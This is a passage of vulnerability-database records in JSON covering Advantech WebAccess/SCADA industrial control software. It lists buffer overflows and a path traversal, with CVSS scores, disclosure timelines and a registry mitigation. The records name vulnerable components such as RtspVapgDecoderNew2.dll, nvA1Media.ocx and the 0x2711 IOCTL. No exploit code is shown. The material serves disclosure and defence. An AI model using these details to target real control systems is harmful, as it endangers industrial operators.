"2023-03-02T00:00:00", "db": "VULHUB", "id": "VHN-142586", "ident": null }, { "date": "2019-06-27T00:00:00", "db": "BID", "id": "108923", "ident": null }, { "date": "2019-07-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005816", "ident": null }, { "date": "2023-03-03T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-1074", "ident": null }, { "date": "2024-11-21T04:20:17.927000", "db": "NVD", "id": "CVE-2019-10985", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-1074" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess/SCADA Path traversal vulnerability", "sources": [ { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6" }, { "db": "CNVD", "id": "CNVD-2019-32476" }, { "db": "CNNVD", "id": "CNNVD-201906-1074" } ], "trust": 1.4 }, "type": { "_id": null, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "ca331763-0568-4e00-aca9-d10db9f939d6" }, { "db": "CNNVD", "id": "CNNVD-201906-1074" } ], "trust": 0.8 } }
var-201708-1584
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 1.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.4, "vendor": "advantech", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1" }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2" }, { "db": "ZDI", "id": "ZDI-17-564" }, { "db": "CNVD", "id": "CNVD-2017-19446" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-564" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-564", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-19446", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d742b40-463f-11e9-8b2e-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-564", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2017-19446", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1" }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2" }, { "db": "ZDI", "id": "ZDI-17-564" }, { "db": "CNVD", "id": "CNVD-2017-19446" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment", "sources": [ { "db": "ZDI", "id": "ZDI-17-564" }, { "db": "CNVD", "id": "CNVD-2017-19446" }, { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1" }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2" } ], "trust": 1.53 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-564", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2017-19446", "trust": 1.0 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4080", "trust": 0.7 }, { "db": "IVD", "id": "7D742B40-463F-11E9-8B2E-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "951DBD8F-796B-41F7-803C-1D632E06C6A2", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1" }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2" }, { "db": "ZDI", "id": "ZDI-17-564" }, { "db": "CNVD", "id": "CNVD-2017-19446" } ] }, "id": "VAR-201708-1584", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1" }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2" }, { "db": "CNVD", "id": "CNVD-2017-19446" } ], "trust": 1.41739574 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1" }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2" }, { "db": "CNVD", "id": "CNVD-2017-19446" } ] }, "last_update_date": "2022-05-17T02:04:30.870000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-564" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-564/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-564" }, { "db": "CNVD", "id": "CNVD-2017-19446" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1", "ident": null }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2", "ident": null }, { "db": "ZDI", "id": "ZDI-17-564", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19446", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-564", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19446", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-564", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19446", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess RtspVapgDecoderNew2 PMSettingData3D Name Heap Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1" }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2" }, { "db": "CNVD", "id": "CNVD-2017-19446" } ], "trust": 1.0 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "7d742b40-463f-11e9-8b2e-000c29342cb1" }, { "db": "IVD", "id": "951dbd8f-796b-41f7-803c-1d632e06c6a2" } ], "trust": 0.4 } }
var-201806-1811
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A stack buffer overflow vulnerability exists in Advantech WebAccess. Failed exploit attempts will likely cause a denial-of-service condition
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.1, "vendor": "advantech", "version": "0" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-526" }, { "db": "CNVD", "id": "CNVD-2018-11703" }, { "db": "BID", "id": "100216" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-526" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-526", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-11703", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-526", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-11703", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1", "trust": 0.2, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-526" }, { "db": "CNVD", "id": "CNVD-2018-11703" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A stack buffer overflow vulnerability exists in Advantech WebAccess. Failed exploit attempts will likely cause a denial-of-service condition", "sources": [ { "db": "ZDI", "id": "ZDI-17-526" }, { "db": "CNVD", "id": "CNVD-2018-11703" }, { "db": "BID", "id": "100216" }, { "db": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1" } ], "trust": 1.62 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-526", "trust": 1.6 }, { "db": "BID", "id": "100216", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-11703", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4100", "trust": 0.7 }, { "db": "IVD", "id": "E2F3F361-39AB-11E9-9EB6-000C29342CB1", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-17-526" }, { "db": "CNVD", "id": "CNVD-2018-11703" }, { "db": "BID", "id": "100216" } ] }, "id": "VAR-201806-1811", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-11703" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-11703" } ] }, "last_update_date": "2022-05-17T01:46:23.440000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-526" } ] }, "references": { "_id": null, "data": [ { "trust": 0.9, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-526/" }, { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/100216" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-526" }, { "db": "CNVD", "id": "CNVD-2018-11703" }, { "db": "BID", "id": "100216" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-17-526", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-11703", "ident": null }, { "db": "BID", "id": "100216", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-06-20T00:00:00", "db": "IVD", "id": "e2f3f361-39ab-11e9-9eb6-000c29342cb1", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-526", "ident": null }, { "date": "2018-06-13T00:00:00", "db": "CNVD", "id": "CNVD-2018-11703", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "BID", "id": "100216", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-526", "ident": null }, { "date": "2018-06-20T00:00:00", "db": "CNVD", "id": "CNVD-2018-11703", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "BID", "id": "100216", "ident": null } ] }, "threat_type": { "_id": null, "data": "network", "sources": [ { "db": "BID", "id": "100216" } ], "trust": 0.3 }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Connect MediaURL Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-526" } ], "trust": 0.7 }, "type": { "_id": null, "data": "Boundary Condition Error", "sources": [ { "db": "BID", "id": "100216" } ], "trust": 0.3 } }
var-202107-1927
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwImgExe.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-778" } ] }, "credits": { "_id": null, "data": "Natnael Samson (@NattiSamson)", "sources": [ { "db": "ZDI", "id": "ZDI-21-778" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "ZDI-21-778", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 0.7, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "ZDI-21-778", "trust": 0.7, "value": "CRITICAL" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-778" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within BwImgExe.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user.", "sources": [ { "db": "ZDI", "id": "ZDI-21-778" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-13038", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-21-778", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-21-778" } ] }, "id": "VAR-202107-1927", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:03:09.159000Z", "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-21-778", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2021-07-05T00:00:00", "db": "ZDI", "id": "ZDI-21-778", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2021-07-07T00:00:00", "db": "ZDI", "id": "ZDI-21-778", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess Node BwImgExe Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-21-778" } ], "trust": 0.7 } }
var-201708-1119
Vulnerability from variot
A heap-based buffer overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities where there is a lack of proper validation of the length of user-supplied data prior to copying it to the heap-based buffer, which could allow an attacker to execute arbitrary code under the context of the process. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. This may aid in further attacks. Advantech WebAccess versions prior to V8.2_20170817 are vulnerable. The vulnerability stems from the fact that the program does not fully verify the length of the data submitted by the user
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1119", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9" }, { "db": "CNVD", "id": "CNVD-2017-23883" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007399" }, { "db": "CNNVD", "id": "CNNVD-201708-1280" }, { "db": "NVD", "id": "CVE-2017-12704" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007399" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands, rgod, Tenable Network Security,an anonymous researcher all working with Trend Micro??s Zero Day Initiative, and Haojun Hou and DongWang from ADLab of Venustech.", "sources": [ { "db": "BID", "id": "100526" } ], "trust": 0.3 }, "cve": "CVE-2017-12704", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-12704", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-23883", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "96d43de0-3f58-40e3-841a-e1b2d8a8fcd9", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-103253", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2017-12704", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": 